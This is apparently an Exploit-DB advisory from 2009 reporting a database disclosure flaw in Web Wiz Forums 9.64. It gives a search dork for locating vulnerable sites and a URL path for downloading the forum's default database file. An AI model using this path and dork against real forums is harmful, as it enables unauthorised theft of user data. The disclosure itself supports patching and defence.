Web Wiz Forums 9.64 - Database Disclosure

EDB-ID:

10638

CVE:



Author:

ViRuSMaN

Type:

webapps


Platform:

ASP

Date:

2009-12-24


==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|


==============================================================================
        [»] ~ Note : Some forums may change the path of the "database/wwForum.mdb" cause the vulnerability not work
==============================================================================
        [»] Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability
==============================================================================

    [»] Script:             [ Web Wiz Forums v9.64 ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Web Wiz Forums - Free Forum Software - Free Bulletin Board Software ]
    [»] Download:           [ http://www.webwizguide.com/webwizforums/webwizforums_downloads.asp ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com  ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
    [»] Dork:               [ Web Wiz Forums® version 9.64 [Free Express Edition] ]

###########################################################################

===[ Exploit ]===

    [»] http://[target].com/[path]/database/wwForum.mdb

Author: ViRuSMaN <-

###########################################################################